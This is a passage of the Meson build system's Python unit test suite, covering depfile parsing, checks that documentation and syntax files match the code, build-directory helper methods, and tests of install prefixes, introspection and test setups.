(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE)) + [None]
for s1, s2 in zip(sections[:], sections[1:]):
if s1.group(1) == "Universal options":
# Extract the content for this section
end = s2.start() if s2 is not None else len(md)
content = md[s1.end():end]
subsections = list(re.finditer(r"^### (.+)$", content, re.MULTILINE)) + [None]
for sub1, sub2 in zip(subsections[:], subsections[1:]):
if sub1.group(1) == "Directories" or sub1.group(1) == "Core options":
# Extract the content for this subsection
sub_end = sub2.start() if sub2 is not None else len(content)
subcontent = content[sub1.end():sub_end]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) .* \|", subcontent, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(len(found_entries & arches), 0)
found_entries |= arches
break
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md") as f:
md = f.read()
self.assertIsNotNone(md)
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE))
for s1, s2 in zip(sections[::2], sections[1::2]):
if s1.group(1) == "CPU families":
# Extract the content for this section
content = md[s1.end():s2.start()]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt") as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
clre = re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)
linkre = re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)
self.assertNotRegex(ret, clre)
self.assertNotRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
prefix = '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
for prefix in expected:
args = ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
}
for args in expected:
self.init(testdir, extra_args=args.split(), default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[args]:
self.assertEqual(value, expected[args][name])
self.wipe()
def test_clike_get_library_dirs(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
for d in cc.get_library_dirs(env):
self.assertTrue(os.path.exists(d))
self.assertTrue(os.path.isdir(d))
self.assertTrue(os.path.isabs(d))
def test_static_library_overwrite(self):
'''
Tests that static libraries are never appended to, always overwritten.
Has to be a unit test because this involves building a project,
reconfiguring, and building it again so that `ar` is run twice on the
same static library.
https://github.com/mesonbuild/meson/issues/1355
'''
testdir = os.path.join(self.common_test_dir, '3 static')
env = get_fake_env(testdir, self.builddir, self.prefix)
cc = env.detect_c_compiler(MachineChoice.HOST)
static_linker = env.detect_static_linker(cc)
if is_windows():
raise unittest.SkipTest('https://github.com/mesonbuild/meson/issues/1526')
if not isinstance(static_linker, mesonbuild.linkers.ArLinker):
raise unittest.SkipTest('static linker is not `ar`')
# Configure
self.init(testdir)
# Get name of static library
targets = self.introspect('--targets')
self.assertEqual(len(targets), 1)
libname = targets[0]['filename'][0]
# Build and get contents of static library
self.build()
before = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
before = [f for f in before if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(before), 1, msg=before)
# Change the source to be built into the static library
self.setconf('-Dsource=libfile2.c')
self.build()
after = self._run(['ar', 't', os.path.join(self.builddir, libname)]).split()
# Filter out non-object-file contents
after = [f for f in after if f.endswith(('.o', '.obj'))]
# Static library should contain only one object
self.assertEqual(len(after), 1, msg=after)
# and the object must have changed
self.assertNotEqual(before, after)
def test_static_compile_order(self):
'''
Test that the order of files in a compiler command-line while compiling
and linking statically is deterministic. This can't be an ordinary test
case because we need to inspect the compiler database.
https://github.com/mesonbuild/meson/pull/951
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
self.init(testdir)
compdb = self.get_compdb()
# Rules will get written out in this order
self.assertTrue(compdb[0]['file'].endswith("libfile.c"))
self.assertTrue(compdb[1]['file'].endswith("libfile2.c"))
self.assertTrue(compdb[2]['file'].endswith("libfile3.c"))
self.assertTrue(compdb[3]['file'].endswith("libfile4.c"))
# FIXME: We don't have access to the linker command
def test_run_target_files_path(self):
'''
Test that run_targets are run from the correct directory
https://github.com/mesonbuild/meson/issues/957
'''
testdir = os.path.join(self.common_test_dir, '54 run target')
self.init(testdir)
self.run_target('check_exists')
def test_install_introspection(self):
'''
Tests that the Meson introspection API exposes install filenames correctly
https://github.com/mesonbuild/meson/issues/829
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/lib/libstat.a'])
self.assertPathListEqual(intro[1]['install_filename'], ['/usr/bin/prog' + exe_suffix])
def test_install_subdir_introspection(self):
'''
Test that the Meson introspection API also contains subdir install information
https://github.com/mesonbuild/meson/issues/5556
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
intro = self.introspect('--installed')
expected = {
'sub2': 'share/sub2',
'subdir/sub1': 'share/sub1',
'subdir/sub_elided': 'share',
'sub1': 'share/sub1',
'sub/sub1': 'share/sub1',
'sub_elided': 'share',
'nested_elided/sub': 'share',
}
self.assertEqual(len(intro), len(expected))
# Convert expected to PurePath
expected_converted = {PurePath(os.path.join(testdir, key)): PurePath(os.path.join(self.prefix, val)) for key, val in expected.items()}
intro_converted = {PurePath(key): PurePath(val) for key, val in intro.items()}
for src, dst in expected_converted.items():
self.assertIn(src, intro_converted)
self.assertEqual(dst, intro_converted[src])
def test_install_introspection_multiple_outputs(self):
'''
Tests that the Meson introspection API exposes multiple install filenames correctly without crashing
https://github.com/mesonbuild/meson/pull/4555
Reverted to the first file only because of https://github.com/mesonbuild/meson/pull/4547#discussion_r244173438
TODO Change the format to a list officially in a followup PR
'''
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
testdir = os.path.join(self.common_test_dir, '144 custom target multiple outputs')
self.init(testdir)
intro = self.introspect('--targets')
if intro[0]['type'] == 'executable':
intro = intro[::-1]
self.assertPathListEqual(intro[0]['install_filename'], ['/usr/include/diff.h', '/usr/bin/diff.sh'])
self.assertPathListEqual(intro[1]['install_filename'], ['/opt/same.h', '/opt/same.sh'])
self.assertPathListEqual(intro[2]['install_filename'], ['/usr/include/first.h', None])
self.assertPathListEqual(intro[3]['install_filename'], [None, '/usr/bin/second.sh'])
def test_install_log_content(self):
'''
Tests that the install-log.txt is consistent with the installed files and directories.
Specifically checks that the log file only contains one entry per file/directory.
https://github.com/mesonbuild/meson/issues/4499
'''
testdir = os.path.join(self.common_test_dir, '62 install subdir')
self.init(testdir)
self.install()
installpath = Path(self.installdir)
# Find installed files and directories
expected = {installpath: 0}
for name in installpath.rglob('*'):
expected[name] = 0
# Find logged files and directories
with Path(self.builddir, 'meson-logs', 'install-log.txt').open() as f:
logged = list(map(lambda l: Path(l.strip()),
filter(lambda l: not l.startswith('#'),
f.readlines())))
for name in logged:
self.assertTrue(name in expected, 'Log contains extra entry {}'.format(name))
expected[name] += 1
for name, count in expected.items():
self.assertGreater(count, 0, 'Log is missing entry for {}'.format(name))
self.assertLess(count, 2, 'Log has multiple entries for {}'.format(name))
def test_uninstall(self):
exename = os.path.join(self.installdir, 'usr/bin/prog' + exe_suffix)
testdir = os.path.join(self.common_test_dir, '8 install')
self.init(testdir)
self.assertPathDoesNotExist(exename)
self.install()
self.assertPathExists(exename)
self.uninstall()
self.assertPathDoesNotExist(exename)
def test_forcefallback(self):
testdir = os.path.join(self.unit_test_dir, '31 forcefallback')
self.init(testdir, extra_args=['--wrap-mode=forcefallback'])
self.build()
self.run_tests()
def test_env_ops_dont_stack(self):
'''
Test that env ops prepend/append do not stack, and that this usage issues a warning
'''
testdir = os.path.join(self.unit_test_dir, '63 test env does not stack')
out = self.init(testdir)
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_APPEND')
self.assertRegex(out, r'WARNING: Overriding.*TEST_VAR_PREPEND')
self.assertNotRegex(out, r'WARNING: Overriding.*TEST_VAR_SET')
self.run_tests()
def test_testsetups(self):
if not shutil.which('valgrind'):
raise unittest.SkipTest('Valgrind not installed.')
testdir = os.path.join(self.unit_test_dir, '2 testsetups')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
basic_log = f.read()
# Run buggy test with setup that has env that will make it fail
self.assertRaises(subprocess.CalledProcessError,
self._run, self.mtest_command + ['--setup=valgrind'])
with open(os.path.join(self.logdir, 'testlog-valgrind.txt')) as f:
vg_log = f.read()
self.assertFalse('TEST_ENV is set' in basic_log)
self.assertFalse('Memcheck' in basic_log)
self.assertTrue('TEST_ENV is set' in vg_log)
self.assertTrue('Memcheck' in vg_log)
# Run buggy test with setup without env that will pass
self._run(self.mtest_command + ['--setup=wrapper'])
# Setup with no properties works
self._run(self.mtest_command + ['--setup=empty'])
# Setup with only env works
self._run(self.mtest_command + ['--setup=onlyenv'])
self._run(self.mtest_command + ['--setup=onlyenv2'])
self._run(self.mtest_command + ['--setup=onlyenv3'])
# Setup with only a timeout works
self._run(self.mtest_command + ['--setup=timeout'])
def test_testsetup_selection(self):
testdir = os.path.join(self.unit_test_dir, '14 testsetup selection')
self.init(testdir)
self.build()
# Run tests without setup
self.run_tests()
self.assertRaises(subprocess.CalledProcessError, self._run, self.mtest_command + ['--setup=missingfromfoo'])
self._run(self.mtest_command + ['--setup=missingfromfoo', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=worksforall'])
self._run(self.mtest_command + ['--setup=main:worksforall'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:'])
self._run(self.mtest_command + ['--setup=onlyinbar', '--no-suite=main:', '--no-suite=foo:'])
self._run(self.mtest_command + ['--setup=bar:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=foo:onlyinbar'])
self.assertRaises(subprocess.CalledProcessError, self._run,
self.mtest_command + ['--setup=main:onlyinbar'])
def test_testsetup_default(self):
testdir = os.path.join(self.unit_test_dir, '49 testsetup default')
self.init(testdir)
self.build()
# Run tests without --setup will cause the default setup to be used
self.run_tests()
with open(os.path.join(self.logdir, 'testlog.txt')) as f:
default_log = f.read()
# Run tests with explicitly using the same setup that is set as default
self._run(self.mtest_command + ['--setup=mydefault'])
with open(os.path.join(self.logdir, 'testlog-mydefault.txt')) as f:
